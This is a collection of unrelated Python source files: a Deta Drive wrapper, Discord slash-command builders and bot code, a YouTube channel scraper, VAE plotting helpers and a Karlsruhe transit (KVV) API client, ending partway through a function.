self.__log(f'[↑] Uploading | {path} | ...')
content = r.data
self.__drive.put(name=path, data=content)
timer_end = perf_counter()
elapsed = round(timer_end - timer_start)
self.__log(f"[•] Completed | {path} | {round(len(content) * 10 ** (-6), 3)} MB | {elapsed}s")
return content
def rename(self, old_name: str, new_name: str) -> None:
"""
Rename a file on the drive
:param old_name: old name of the file
:param new_name: new name of the file to be saved
:return: None
"""
content = self.__drive.get(old_name)
if content:
self.__drive.put(name=new_name, data=content)
self.__log(f"[!] Renamed | ({old_name}) -> ({new_name})")
self.__drive.delete(old_name)
else:
raise FileNotFound(f'file ({old_name}) does not exist')
def download(self, file_name: str) -> None:
"""
Download a file from the drive
:param file_name: name/path of the file to download
:return: None
"""
resp = self.__drive.get(file_name)
if resp:
self.__log(f'[↓] Downloading | {file_name} | ...')
timer_start = perf_counter()
with open(file_name, "wb") as f:
size = 0
for chunk in resp.iter_chunks(1024):
if chunk:
size += len(chunk)
f.write(chunk)
timer_end = perf_counter()
elapsed = round(timer_end - timer_start)
self.__log(f"[•] Completed | {file_name} | {round(size * 10 ** (-6), 3)} MB | {elapsed}s")
else:
raise FileNotFound(f"file ({file_name}) does not exist")
def file_stream(self, file_name: str) -> bytes:
"""
Download a file from the drive and return its content (streamable)
:param file_name: name/path of the file to stream
:return: bytes
"""
stream = self.__drive.get(file_name)
if stream:
return stream
raise FileNotFound(f"file ({file_name}) does not exist")
def cache(self, file_name: str) -> bytes:
"""
Download a file from the drive and return its content (bytes)
:param file_name: name/path of the file to cache
:return: bytes
"""
resp = self.__drive.get(file_name)
if resp:
self.__log(f'[🗎] Caching | {file_name} | ...')
timer_start = perf_counter()
byte_list = [chunk for chunk in resp.iter_chunks(1024)]
content = b''.join(byte_list)
timer_end = perf_counter()
elapsed = round(timer_end - timer_start)
self.__log(f'[🗎] Completed | {file_name} | {round(len(content) * 10 ** (-6), 3)} MB | {elapsed}s')
return content
raise FileNotFound(f"file ({file_name}) does not exist")
def download_all(self) -> None:
"""
Download all files in the account to the current directory
:return: None
"""
for file_name in self.files():
self.download(file_name)
def delete(self, file_name: str = None, file_names: list[str] = None) -> None:
"""
Delete a file from the drive
:param file_name: file name/path to delete
:param file_names: list of file names/paths to delete
:return: None
"""
if file_name and file_name != '.air':
self.__drive.delete(file_name)
self.__log(f"[!] Deleted | ({file_name})")
        elif file_names:
files = [file for file in file_names if file != '.air']
try:
self.__drive.delete_many(files)
except AssertionError:
raise InvalidParameter(f"Parameter 'file_names' must be a list of non-empty strings")
self.__log(f"[!] Deleted | ({' , '.join(files)})")
else:
raise InvalidParameter(f"Parameter 'file_names' must be a list of non-empty strings")
def delete_all(self) -> None:
"""
Delete all files in the drive
:return: None
"""
files = self.files()
try:
files.remove('.air')
except ValueError:
self.__drive.put(name='.air', data=b' ')
self.__drive.delete_many(files)
self.__log("[!] Deleted all files")
def delete_account(self) -> None:
"""
Deletes the entire account
:return: None
"""
try:
self.__drive.delete_many(self.files())
except AssertionError:
raise AccountNotFound("Account having above credentials cannot be found")
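# Hedged usage sketch (credentials and file names are placeholders, not from the original file;
# a valid deta.sh project key and network access are required):
#
#   drive = AirDrive.create('my_username', 'my_password')   # or AirDrive.login(...)
#   drive.upload(remote_file_name='notes.txt', file_content=b'hello')
#   print(drive.files())
#   drive.download('notes.txt')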
``` |
{
"source": "jnsougata/discord.py",
"score": 3
} |
#### File: ext/appcommands/builder.py
```python
from typing import Any
class _Option:
data: Any
class Choice:
def __init__(self, name: str, value: Any):
self.data = {
"name": name,
"value": value
}
class StrOption(_Option):
def __init__(self, name: str, description: str, required: bool = False, choices: list[Choice] = None):
self.data = {
"name": name,
"description": description,
"type": 3,
"required": required,
"choices": [choice.data for choice in choices] if choices else []
}
class IntOption(_Option):
def __init__(self, name: str, description: str, required: bool = False, choices: list[Choice] = None):
self.data = {
"name": name,
"description": description,
"type": 4,
"required": required,
"choices": [choice.data for choice in choices] if choices else []
}
class BoolOption(_Option):
def __init__(self, name: str, description: str, required: bool = False, choices: list[Choice] = None):
self.data = {
"name": name,
"description": description,
"type": 5,
"required": required,
"choices": [choice.data for choice in choices] if choices else []
}
class UserOption(_Option):
def __init__(self, name: str, description: str, required: bool = False, choices: list[Choice] = None):
self.data = {
"name": name,
"description": description,
"type": 6,
"required": required,
"choices": [choice.data for choice in choices] if choices else []
}
class ChannelOption(_Option):
def __init__(self, name: str, description: str, required: bool = False, choices: list[Choice] = None):
self.data = {
"name": name,
"description": description,
"type": 7,
"required": required,
"choices": [choice.data for choice in choices] if choices else []
}
class RoleOption(_Option):
def __init__(self, name: str, description: str, required: bool = False, choices: list[Choice] = None):
self.data = {
"name": name,
"description": description,
"type": 8,
"required": required,
"choices": [choice.data for choice in choices] if choices else []
}
class MentionableOption(_Option):
def __init__(self, name: str, description: str, required: bool = False, choices: list[Choice] = None):
self.data = {
"name": name,
"description": description,
"type": 9,
"required": required,
"choices": [choice.data for choice in choices] if choices else []
}
class NumberOption(_Option):
def __init__(self, name: str, description: str, required: bool = False, choices: list[Choice] = None):
self.data = {
"name": name,
"description": description,
"type": 10,
"required": required,
"choices": [choice.data for choice in choices] if choices else []
}
class SlashCommand:
def __init__(self, name: str, description: str, options: list[_Option] = None):
self.name = name
self.description = description
self._payload = {
"name": name,
"description": description,
"type": 1,
"options": [option.data for option in options] if options else []
}
@staticmethod
def subcommand(name: str, description: str, options: list):
return {
"name": name,
"description": description,
"type": 1,
"options": options
}
@staticmethod
def subcommand_group(name: str, description: str, options: list):
return {
"name": name,
"description": description,
"type": 2,
"options": options
}
@staticmethod
def create_subcommand(name: str, description: str):
return {
"name": name,
"description": description,
"type": 1,
}
@staticmethod
def set_choice(name: str, value):
return {"name": name, "value": value}
@property
def to_dict(self):
return self._payload
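# Hedged usage sketch (command name, description and choices are placeholders):
# composing a slash command payload from the builders above.
#
#   cmd = SlashCommand(
#       name='echo',
#       description='repeat a message',
#       options=[StrOption('text', 'what to repeat', required=True,
#                          choices=[Choice('hello', 'hello'), Choice('bye', 'bye')])]
#   )
#   payload = cmd.to_dict   # note: to_dict is a property, not a method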
``` |
{
"source": "jnsougata/Ditch-YouTube-API",
"score": 3
} |
#### File: Ditch-YouTube-API/src/channelbulk.py
```python
import re
from .auxiliary import _src
from ._threads import _Thread
class _ChannelBulk:
def __init__(self, iterable: list):
self._ls = iterable
@property
def ids(self):
return self._ls
@property
def urls(self):
head = 'https://www.youtube.com/channel/'
return [f'{head}{item}' for item in self._ls]
@property
def _sources(self):
head = 'https://www.youtube.com/channel/'
urls = [f'{head}{item}/about' for item in self._ls]
def get_page(url):
return _src(url)
return _Thread.run(get_page, urls)
@property
def names(self):
pattern = r"channelMetadataRenderer\":{\"title\":\"(.*?)\""
return [re.findall(pattern, item)[0] for item in self._sources]
@property
def subscribers(self):
pattern = r"}},\"simpleText\":\"(.*?) "
temp = [re.findall(pattern, item) for item in self._sources]
return [item[0] if item else None for item in temp]
@property
def views(self):
pattern = r"viewCountText\":{\"simpleText\":\"(.*?)\""
temp = [re.findall(pattern, item) for item in self._sources]
return [item[0][:-6] if item else None for item in temp]
@property
def joined(self):
pattern = r"text\":\"Joined \"},{\"text\":\"(.*?)\""
temp = [re.findall(pattern, item) for item in self._sources]
return [item[0] if item else None for item in temp]
@property
def countries(self):
pattern = r"country\":{\"simpleText\":\"(.*?)\""
temp = [re.findall(pattern, item) for item in self._sources]
return [item[0] if item else None for item in temp]
@property
def custom_urls(self):
pattern = r"canonicalChannelUrl\":\"(.*?)\""
temp = [re.findall(pattern, item) for item in self._sources]
        return [item[0] if item and '/channel' not in item[0] else None for item in temp]
@property
def descriptions(self):
pattern = r"description\":{\"simpleText\":\"(.*?)\""
temp = [re.findall(pattern, item) for item in self._sources]
return [item[0].replace('\\n', ' ') if item else None for item in temp]
@property
def avatars(self):
pattern = "height\":88},{\"url\":\"(.*?)\""
temp = [re.findall(pattern, item) for item in self._sources]
return [item[0] if item else None for item in temp]
@property
def banners(self):
pattern = r"width\":1280,\"height\":351},{\"url\":\"(.*?)\""
temp = [re.findall(pattern, item) for item in self._sources]
return [item[0] if item else None for item in temp]
@property
def verifieds(self):
pattern = 'label":"Verified'
return [True if re.search(pattern, item) else False for item in self._sources]
@property
def lives(self):
pattern = r'{"text":" watching"}'
return [True if re.search(pattern, item) else False for item in self._sources]
``` |
{
"source": "jnsougata/Ezcord",
"score": 2
} |
#### File: src/ezcord/bot.py
```python
import os
import asyncio
import aiohttp
from .user import User
from .cprint import Log
from .slash import Slash
from .guild import Guild
from functools import wraps
from .channel import Channel
from .socket import WebSocket
class Bot(WebSocket):
def __init__(
self,
prefix: str,
intents: int,
app_id: int = None,
guild_id: int = None,
):
self._events = {}
self._cmd_pool = {}
self._slash_queue = []
self._app_id = app_id
self.prefix = prefix
self._secret = ''
self.intents = intents
self.guild_id = guild_id
super().__init__(
app_id=app_id,
prefix=prefix,
intents=intents,
guild_id=guild_id,
events=self._events,
token=self._secret,
commands=self._cmd_pool,
slash_queue=self._slash_queue,
)
@property
def guilds(self):
return len(self._guilds)
@property
def channels(self):
return len(self._channels)
def slash_command(self, command: Slash):
self._slash_queue.append(command.json)
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
return func
self._cmd_pool[command.json["name"]] = wrapper()
return decorator
def command(self, name: str):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
return func
self._cmd_pool[name] = wrapper()
return decorator
def event(self, fn):
self._events[fn.__name__] = fn
def run(self, token: str):
self._secret = token
loop = asyncio.new_event_loop()
try:
loop.run_until_complete(self._connect())
except KeyboardInterrupt:
Log.purple('[!] --------------------------')
Log.red(f'[🔌] 🖿 ━━━━━━━━━ x ━━━━━━━━━ 🌐')
os._exit(0)
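# Hedged usage sketch (prefix, intents value and token are placeholders; the exact handler
# signature depends on the WebSocket dispatcher, which is not shown in this file):
#
#   bot = Bot(prefix='!', intents=513)
#
#   @bot.command(name='ping')
#   async def ping(ctx):
#       await ctx.send('pong')
#
#   bot.run('YOUR_BOT_TOKEN')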
```
#### File: src/ezcord/context.py
```python
import json
from .embed import Embed
from .guild import Guild
from .member import Member
from .message import Message
from .channel import Channel
from aiohttp import ClientSession
class Context:
def __init__(self, _object: dict, _cached: dict):
self._object = _object
self._cached = _cached
self._secret = _object.get('_token')
self._session = _object.get('session')
self._guild_id = _object.get('guild_id')
self._channel_id = _object.get('channel_id')
self._author_id = _object.get('author').get('id')
self._head = 'https://discord.com/api/v9'
@property
def message(self):
return Message(self._object)
@property
def author(self):
return self.guild.get_member(int(self._author_id))
@property
def guild(self):
return Guild(self._cached['guilds'][self._guild_id])
async def send(self, content: str = None, embed: Embed = None, embeds: [Embed] = None):
if embeds:
payload = [embed.dict() for embed in embeds]
elif embed:
payload = [embed.dict()]
else:
payload = []
resp = await self._session.post(
f'{self._head}/channels/{self._channel_id}/messages',
json={
'content': str(content),
'tts': False,
'embeds': payload,
'components': [],
'sticker_ids': [],
'attachments': [],
},
headers={
"Authorization": f"Bot {self._secret}",
"Content-Type": 'application/json'
}
)
return await resp.json()
async def reply(self, content: str = None, embed: Embed = None, embeds: [Embed] = None):
if embeds:
payload = [embed.dict() for embed in embeds]
elif embed:
payload = [embed.dict()]
else:
payload = []
resp = await self._session.post(
f'{self._head}/channels/{self._channel_id}/messages',
json={
'content': str(content),
'tts': False,
'embeds': payload,
'components': [],
'sticker_ids': [],
'attachments': [],
'message_reference': {
'message_id': self.message.id,
'channel_id': self._channel_id,
'guild_id': self.guild.id,
'fail_if_not_exists': False
}
},
headers={
"Authorization": f"Bot {self._secret}",
"Content-Type": 'application/json'
}
)
return await resp.json()
```
#### File: src/ezcord/embed.py
```python
from datetime import datetime
class Embed:
def __init__(self, title: str = None, description: str = None, url: str = None, color: int = None):
self._init = {
'type': 'rich',
'title': title,
'description': description,
'url': url,
'color': color,
'fields': [],
}
def dict(self):
return self._init
def add_field(self, name: str, value: str, inline: bool = False):
self._init['fields'].append({'name': name, 'value': value, 'inline': inline})
def set_footer(self, text: str, icon_url: str = None, proxy_icon_url: str = None):
self._init['footer'] = {'text': text, 'icon_url': icon_url, 'proxy_icon_url': proxy_icon_url}
def set_thumbnail(self, url: str, height: int = None, width: int = None, proxy_url: str = None):
self._init['thumbnail'] = {'url': url, 'height': height, 'width': width, 'proxy_url': proxy_url}
def add_image(self, url: str, height: int = None, width: int = None, proxy_url: str = None):
self._init['image'] = {'url': url, 'height': height, 'width': width, 'proxy_url': proxy_url}
def set_author(self, name: str, url: str = None, icon_url: str = None, proxy_icon_url: str = None):
self._init['author'] = {'name': name, 'url': url, 'icon_url': icon_url, 'proxy_icon_url': proxy_icon_url}
def set_timestamp(self):
self._init['timestamp'] = datetime.utcnow().isoformat()
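# Hedged usage sketch: building an embed payload for the send/reply helpers in context.py.
#
#   embed = Embed(title='Hello', description='A rich embed', color=0x5865F2)
#   embed.add_field(name='Field', value='Value', inline=True)
#   embed.set_timestamp()
#   payload = embed.dict()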
```
#### File: src/ezcord/role.py
```python
class Role:
def __init__(self, payload: dict):
self._data = payload
def __repr__(self):
return f'<Role ({self.name} | {self.id})>'
@property
def mention(self):
return f'<@&{self.id}>'
@property
def name(self):
return self._data.get('name')
@property
def id(self):
return self._data.get('id')
@property
def color(self):
return self._data.get('color')
@property
def hoisted(self):
return self._data.get('hoist')
@property
def managed(self):
return self._data.get('managed')
@property
def mentionable(self):
return self._data.get('mentionable')
@property
def permissions(self):
return self._data.get("permissions")
@property
def position(self):
return self._data.get('position')
@property
def bot_id(self):
tags = self._data.get('tags')
if tags:
return tags.get('bot_id')
@property
def integration_id(self):
tags = self._data.get('tags')
if tags:
return tags.get('integration_id')
@property
def booster(self):
tags = self._data.get('tags')
if tags:
return tags.get('premium_subscriber')
@property
def emoji(self):
return self._data.get('unicode_emoji')
@property
def icon(self): #convert asset
return self._data.get('icon')
``` |
{
"source": "jnsougata/PixeL",
"score": 3
} |
#### File: bot/cogs/setup_all.py
```python
import discord
import extlib
from bot.extras.emojis import Emo
from bot.views.custom_view import sub_view_msg
from bot.views.youtube_view import sub_view_youtube
from bot.views.welcomer_view import sub_view_welcomer
from bot.views.pingrole_view import sub_view_pingrole
class Setup(extlib.cog):
def __init__(self, bot: extlib.Bot):
self.bot = bot
@extlib.cog.command(
name='setup',
description='setup the server configurations',
dm_access=False,
category=extlib.CommandType.SLASH
)
@extlib.cog.default_permission(discord.Permissions.manage_guild)
async def setup_command(self, ctx: extlib.Context):
pass
@setup_command.subcommand(
name='youtube',
description='integrates youtube channel to the server',
options=[
extlib.StrOption(
name='channel',
description='url or id of the youtube channel',
required=True),
extlib.ChannelOption(
name='receiver',
description='text channel to receive notifications',
channel_types=[extlib.ChannelType.GUILD_TEXT, extlib.ChannelType.GUILD_NEWS],
required=True),
]
)
async def youtube_command(self, ctx: extlib.Context, channel: str, receiver: discord.TextChannel):
await ctx.defer()
await sub_view_youtube(self.bot, ctx, channel, receiver)
@setup_command.subcommand(
name='welcomer',
description='adds welcome card to the server',
options=[
extlib.ChannelOption(
name='channel',
description='text channel to greet with welcome cards',
channel_types=[extlib.ChannelType.GUILD_TEXT, extlib.ChannelType.GUILD_NEWS],
required=True
),
extlib.AttachmentOption(
name='image',
description='image file to send when new member joins',
required=False
),
]
)
async def welcomer_command(self, ctx: extlib.Context, channel: discord.TextChannel, image: discord.Attachment):
await ctx.defer()
await sub_view_welcomer(self.bot, ctx, image, channel)
@setup_command.subcommand(
name='ping_role',
description='adds role to ping with youtube notification',
options=[
extlib.RoleOption(
name='role', description='role to ping with youtube notification', required=True),
]
)
async def ping_role_command(self, ctx: extlib.Context, role: discord.Role):
await ctx.defer()
await sub_view_pingrole(self.bot, ctx, role)
@setup_command.subcommand(
name='custom_message',
description='adds custom welcome and notification message',
options=[
extlib.IntOption(
name='option',
description='type of message to add or edit',
choices=[
extlib.Choice(name='upload', value=1),
extlib.Choice(name='welcome', value=0),
extlib.Choice(name='livestream', value=2),
],
required=True),
]
)
async def custom_message_command(self, ctx: extlib.Context, option: int):
await sub_view_msg(self.bot, ctx, option)
async def setup(bot: extlib.Bot):
await bot.add_application_cog(Setup(bot))
```
#### File: bot/views/removal_view.py
```python
import io
import asyncio
import aiotube
import discord
from asyncdeta import Field
from bot.extras.emojis import Emo
from extlib import Context, Bot
class OptionView(discord.ui.View):
def __init__(self, ctx: Context):
self.ctx = ctx
super().__init__()
self.value = None
@discord.ui.button(label='Welcome', style=discord.ButtonStyle.green, emoji=f'{Emo.IMG}')
async def welcome(self, interaction: discord.Interaction, button: discord.ui.Button):
if self.ctx.author == interaction.user:
self.value = 1
self.stop()
@discord.ui.button(label='Upload', style=discord.ButtonStyle.blurple, emoji=f'{Emo.YT}')
async def upload(self, interaction: discord.Interaction, button: discord.ui.Button):
if self.ctx.author == interaction.user:
self.value = 2
self.stop()
@discord.ui.button(label='Live', style=discord.ButtonStyle.red, emoji=f'{Emo.LIVE}')
async def live(self, interaction: discord.Interaction, button: discord.ui.Button):
if self.ctx.author == interaction.user:
self.value = 3
self.stop()
async def on_timeout(self) -> None:
pass
async def create_menu(loop: asyncio.AbstractEventLoop, channel_ids: list):
def get_channel_names():
container = []
for channel_id in channel_ids:
try:
channel = aiotube.Channel(channel_id)
container.append(channel.name)
except Exception:
container.append('Invalid Channel')
return container
channel_names = await loop.run_in_executor(None, get_channel_names)
return [discord.SelectOption(label=name or 'Invalid Name', value=ch_id, emoji=Emo.YT)
for name, ch_id in zip(channel_names, channel_ids)][:24]
class ChannelMenu(discord.ui.Select):
def __init__(self, bot: Bot, ctx: Context, menu: list):
self.bot = bot
self.ctx = ctx
super().__init__(min_values=1, max_values=1, options=menu, placeholder='existing youtube channels')
async def callback(self, interaction: discord.Interaction):
channel_id = self.values[0]
if interaction.user == self.ctx.author:
if channel_id == '0':
await self.ctx.delete_response()
return
ch = aiotube.Channel(channel_id)
info = ch.info
emd = discord.Embed(
title=f'🚮 {info["name"]}',
description=f'\n> **Subs:** {info["subscribers"]}'
f'\n> **Views:** {info["views"]}'
f'\n> **Id:** {info["id"]}',
url=info["url"], color=0xc4302b)
banner_url = info['banner']
avatar_url = info['avatar']
if banner_url and banner_url.startswith('http'):
emd.set_image(url=banner_url)
if avatar_url and avatar_url.startswith('http'):
emd.set_thumbnail(url=avatar_url)
await self.ctx.edit_response(embed=emd, view=None)
try:
self.bot.cached[self.ctx.guild.id].get('CHANNELS').pop(channel_id)
except KeyError:
pass
await self.bot.db.add_field(
key=str(self.ctx.guild.id),
field=Field('CHANNELS', self.bot.cached[self.ctx.guild.id].get('CHANNELS')),
force=True
)
async def sub_view_remove(bot: Bot, ctx: Context, value: int):
if value == 1:
data = bot.cached[ctx.guild.id].get('CHANNELS')
if data:
menu = await create_menu(ctx.client.loop, list(data))
menu.insert(0, discord.SelectOption(label='cancel', value='0', emoji=Emo.CROSS))
view = discord.ui.View()
view.add_item(ChannelMenu(bot, ctx, menu))
await ctx.send_followup(
embed=discord.Embed(description='> Please select a channel from menu below:'), view=view)
else:
await ctx.send_followup(embed=discord.Embed(description='> There is no channel to remove.'))
elif value == 2:
bot.cached[ctx.guild.id]['RECEPTION'] = None
await ctx.send_followup(embed=discord.Embed(description='> Welcomer has been removed.'))
await bot.db.add_field(key=str(ctx.guild.id), field=Field('RECEPTION', None), force=True)
elif value == 3:
bot.cached[ctx.guild.id]['PINGROLE'] = None
await ctx.send_followup(embed=discord.Embed(description='> Ping role has been removed.'))
await bot.db.add_field(key=str(ctx.guild.id), field=Field('PINGROLE', None), force=True)
elif value == 4:
data = bot.cached[ctx.guild.id].get('CUSTOM')
if data:
view = OptionView(ctx)
emd = discord.Embed(description='> Tap a button to remove corresponding message:')
await ctx.send_followup(embed=emd, view=view)
await view.wait()
if view.value == 1:
data['welcome'] = None
await bot.db.add_field(key=str(ctx.guild.id), field=Field('CUSTOM', data), force=True)
await ctx.edit_response(
embed=discord.Embed(description='> Custom Welcome message has been removed.'), view=None)
elif view.value == 2:
data['upload'] = None
await bot.db.add_field(key=str(ctx.guild.id), field=Field('CUSTOM', data), force=True)
await ctx.edit_response(
embed=discord.Embed(description='> Custom Upload message has been removed.'), view=None)
elif view.value == 3:
data['live'] = None
await bot.db.add_field(key=str(ctx.guild.id), field=Field('CUSTOM', data), force=True)
await ctx.edit_response(
embed=discord.Embed(description='> Custom Live message has been removed.'), view=None)
else:
await ctx.send_followup('> 👀 you have not set any custom messages yet!')
```
#### File: bot/views/welcomer_view.py
```python
import discord
import asyncio
import aiohttp
from asyncdeta import Field
from bot.extras.emojis import *
from extlib import Context, Bot
async def sub_view_welcomer(bot: Bot, ctx: Context, image: discord.Attachment, reception: discord.TextChannel):
async def check_reception_perms():
bot_can = reception.permissions_for(ctx.me)
if not bot_can.send_messages:
embed = discord.Embed(
title=f'{Emo.WARN} I cannot set that as a reception',
description=f'I cannot set {reception.mention} as reception'
f'\nBecause I am unable to `send messages` in that channel'
)
await ctx.edit_response(embed=embed)
return False
elif not bot_can.attach_files:
embed = discord.Embed(
title=f'{Emo.WARN} I cannot set that as a reception',
description=f'I cannot set {reception.mention} as reception'
f'\nBecause I am unable to `attach files` in that channel'
)
await ctx.send_followup(embed=embed)
return False
else:
return True
if reception and image:
if await check_reception_perms():
await bot.db.add_field(key=str(ctx.guild.id), field=Field('RECEPTION', str(reception.id)), force=True)
emd = discord.Embed(
title=f'{Emo.CHECK} Welcome Card Updated',
description=f'Bound to <#{reception.id}>',
)
emd.set_image(url=image.url)
await ctx.send_followup(embed=emd)
bot.cached[ctx.guild.id]['RECEPTION'] = str(reception.id)
async with aiohttp.ClientSession() as session:
async with session.get(image.url) as resp:
chunks = await resp.read()
await bot.drive.upload(file_name=f'covers/{ctx.guild.id}_card.png', content=chunks)
elif reception:
if await check_reception_perms():
await bot.db.add_field(key=str(ctx.guild.id), field=Field('RECEPTION', str(reception.id)), force=True)
emd = discord.Embed(
title=f'{Emo.CHECK} Reception Updated',
description=f'Current set reception channel is {reception.mention}'
f'\nThis channel will be used to send welcome cards')
await ctx.send_followup(embed=emd)
bot.cached[ctx.guild.id]['RECEPTION'] = str(reception.id)
```
#### File: jnsougata/PixeL/main.py
```python
import os
import discord
import extlib
from asyncdeta import Deta
intent = discord.Intents().default()
intent.members = True
class PixeL(extlib.Bot):
__dirs__ = os.listdir('bot/cogs')
def __init__(self):
super().__init__(intents=intent, help_command=None, command_prefix='µ', chunk_guilds_at_startup=False)
self.init_ext = ['bot.cogs.' + file[:-3] for file in self.__dirs__ if file.endswith('.py')]
self.db = None
self.drive = None
self.cached = None
async def on_ready(self):
print(f'Logged in as {self.user} (ID: {self.user.id})')
print('------')
async def setup_hook(self) -> None:
deta = Deta(os.getenv('DETA_TOKEN'))
await deta.connect(session=self.http._HTTPClient__session, loop=self.loop)
self.db = deta.base('01PIXEL')
self.drive = deta.drive('PixeL_@11223344')
await self.build_cache()
for ext in self.init_ext:
await self.load_extension(ext)
async def build_cache(self):
fields = await self.db.fetch_all()
self.cached = {int(field.pop('key')): field for field in fields}
pixel = PixeL()
pixel.run(os.getenv('DISCORD_TOKEN'))
``` |
{
"source": "jnsougata/rich-embed",
"score": 2
} |
#### File: rich-embed/src/ping.py
```python
import discord
import app_util
class Ping(app_util.Cog):
def __init__(self, bot: app_util.Bot):
self.bot = bot
@app_util.Cog.command(
command=app_util.SlashCommand(
name='ping', description='shows avg ping of client'
),
guild_id=877399405056102431
)
async def command(self, ctx: app_util.Context):
await ctx.send_response(embed=discord.Embed(title=f'{self.bot.latency * 1000:.2f}ms'))
def setup(bot: app_util.Bot):
bot.add_application_cog(Ping(bot))
``` |
{
"source": "jnsrch/disentangling-vae-cwt",
"score": 2
} |
#### File: disentangling-vae-cwt/utils/viz_helpers.py
```python
import random
import numpy as np
from PIL import Image, ImageDraw
import pandas as pd
import torch
import imageio
from torchvision.utils import make_grid
from utils.datasets import get_dataloaders
from utils.helpers import set_seed
FPS_GIF = 12
def get_samples(dataset, num_samples, idcs=None):
""" Generate a number of samples from the dataset.
Parameters
----------
dataset : str
The name of the dataset.
num_samples : int, optional
The number of samples to load from the dataset
idcs : list of ints, optional
        List of indices of images to put at the beginning of the samples.
"""
data_loader = get_dataloaders(dataset,
batch_size=1,
shuffle=idcs is None)
    idcs = list(idcs) if idcs is not None else []
    idcs += random.sample(range(len(data_loader.dataset)), num_samples - len(idcs))
samples = torch.stack([data_loader.dataset[i][0] for i in idcs], dim=0)
print("Selected idcs: {}".format(idcs))
return samples
def sort_list_by_other(to_sort, other, reverse=True):
"""Sort a list by an other."""
return [el for _, el in sorted(zip(other, to_sort), reverse=reverse)]
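# Illustrative example: sort_list_by_other(['a', 'b', 'c'], [2, 3, 1]) returns ['b', 'a', 'c'],
# i.e. the elements of the first list ordered by the corresponding values of the second.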
# TO-DO: clean
def read_loss_from_file(log_file_path, loss_to_fetch):
""" Read the average KL per latent dimension at the final stage of training from the log file.
Parameters
----------
log_file_path : str
Full path and file name for the log file. For example 'experiments/custom/losses.log'.
loss_to_fetch : str
The loss type to search for in the log file and return. This must be in the exact form as stored.
"""
EPOCH = "Epoch"
LOSS = "Loss"
logs = pd.read_csv(log_file_path)
df_last_epoch_loss = logs[logs.loc[:, EPOCH] == logs.loc[:, EPOCH].max()]
df_last_epoch_loss = df_last_epoch_loss.loc[df_last_epoch_loss.loc[:, LOSS].str.startswith(loss_to_fetch), :]
df_last_epoch_loss.loc[:, LOSS] = df_last_epoch_loss.loc[:, LOSS].str.replace(loss_to_fetch, "").astype(int)
df_last_epoch_loss = df_last_epoch_loss.sort_values(LOSS).loc[:, "Value"]
return list(df_last_epoch_loss)
def add_labels(input_image, labels):
"""Adds labels next to rows of an image.
Parameters
----------
input_image : image
The image to which to add the labels
labels : list
The list of labels to plot
"""
new_width = input_image.width + 100
new_size = (new_width, input_image.height)
new_img = Image.new("RGB", new_size, color='white')
new_img.paste(input_image, (0, 0))
draw = ImageDraw.Draw(new_img)
for i, s in enumerate(labels):
draw.text(xy=(new_width - 100 + 0.005,
int((i / len(labels) + 1 / (2 * len(labels))) * input_image.height)),
text=s,
fill=(0, 0, 0))
return new_img
def make_grid_img(tensor, **kwargs):
"""Converts a tensor to a grid of images that can be read by imageio.
Notes
-----
    * adapted from https://github.com/pytorch/vision/blob/master/torchvision/utils.py
Parameters
----------
tensor (torch.Tensor or list): 4D mini-batch Tensor of shape (B x C x H x W)
or a list of images all of the same size.
kwargs:
        Additional arguments to `make_grid`.
"""
grid = make_grid(tensor, **kwargs)
img_grid = grid.mul_(255).add_(0.5).clamp_(0, 255).permute(1, 2, 0)
img_grid = img_grid.to('cpu', torch.uint8).numpy()
return img_grid
def get_image_list(image_file_name_list):
image_list = []
for file_name in image_file_name_list:
image_list.append(Image.open(file_name))
return image_list
def arr_im_convert(arr, convert="RGBA"):
"""Convert an image array."""
return np.asarray(Image.fromarray(arr).convert(convert))
def plot_grid_gifs(filename, grid_files, pad_size=7, pad_values=255):
"""Take a grid of gif files and merge them in order with padding."""
grid_gifs = [[imageio.mimread(f) for f in row] for row in grid_files]
n_per_gif = len(grid_gifs[0][0])
# convert all to RGBA which is the most general => can merge any image
imgs = [concatenate_pad([concatenate_pad([arr_im_convert(gif[i], convert="RGBA")
for gif in row], pad_size, pad_values, axis=1)
for row in grid_gifs], pad_size, pad_values, axis=0)
for i in range(n_per_gif)]
imageio.mimsave(filename, imgs, fps=FPS_GIF)
def concatenate_pad(arrays, pad_size, pad_values, axis=0):
"""Concatenate lsit of array with padding inbetween."""
pad = np.ones_like(arrays[0]).take(indices=range(pad_size), axis=axis) * pad_values
new_arrays = [pad]
for arr in arrays:
new_arrays += [arr, pad]
new_arrays += [pad]
return np.concatenate(new_arrays, axis=axis)
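# Hypothetical example (added): merge two frames of the same shape side by side with a
# 7-pixel white strip; the values 255 and axis=1 are illustrative assumptions.
#   merged = concatenate_pad([frame_a, frame_b], pad_size=7, pad_values=255, axis=1)
# The result carries a pad before, between and after the frames along the chosen axis.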
``` |
{
"source": "jns-rch/kvv-timetable",
"score": 3
} |
#### File: jns-rch/kvv-timetable/kvvapi.py
```python
import requests
import pandas as pd
# ToDo: Make own function for API KEY checking
with open("API_KEY.txt") as key_file:
API_KEY = key_file.read()
API_BASE = "https://live.kvv.de/webapp"
REQUEST_TYPES = ["stops_by_name",
"stops_by_id",
"departues_by_stop",
"departues_by_route"]
def kvv_request(request_string):
"""Sends a REST call to "https://live.kvv.de/webapp/"
"""
r = requests.get(request_string)
try:
r.raise_for_status()
except requests.exceptions.HTTPError as error:
ValueError(f"Error in Request: {error}")
else:
return r.json()
def create_request_string(request_type, name="name", stop_id="0", line="S1", max_infos=10):
"""Creates a request string
"""
if request_type == "stops_by_name":
request_string = f"{API_BASE}/stops/byname/{name}?key={API_KEY}"
elif request_type == "stops_by_id":
request_string = f"{API_BASE}/stops/bystop/{stop_id}?key={API_KEY}"
elif request_type == "departues_by_stop":
request_string = f"{API_BASE}/departures/bystop/{stop_id}?maxInfos={max_infos}&key={API_KEY}"
elif request_type == "departues_by_route":
request_string = f"{API_BASE}/departures/byroute/{line}/{stop_id}?maxInfos={max_infos}&key={API_KEY}"
return request_string
def create_departure_dataframe(response_dict):
    """Creates a dataframe with departures for a stop out of a response dict
    """
    return pd.DataFrame(response_dict["departures"])
def update_departure_dataframe(stop_id="0", max_infos=10):
"""Updates the departure dataframe by calling a REST request
"""
request_string = create_request_string(request_type = "departues_by_stop", stop_id=stop_id, max_infos=max_infos)
response = kvv_request(request_string)
departures = create_departure_dataframe(response)
# Place modifications here
return departures
def find_stop_id_by_name(data, stop_name):
"""Search for stop_id in Open Transport Data
"""
stop_id_series = data["stops"][
(data["stops"]["stop_name"] == stop_name) &
(~data["stops"]["stop_id"].str.match("Parent"))
]["stop_id"]
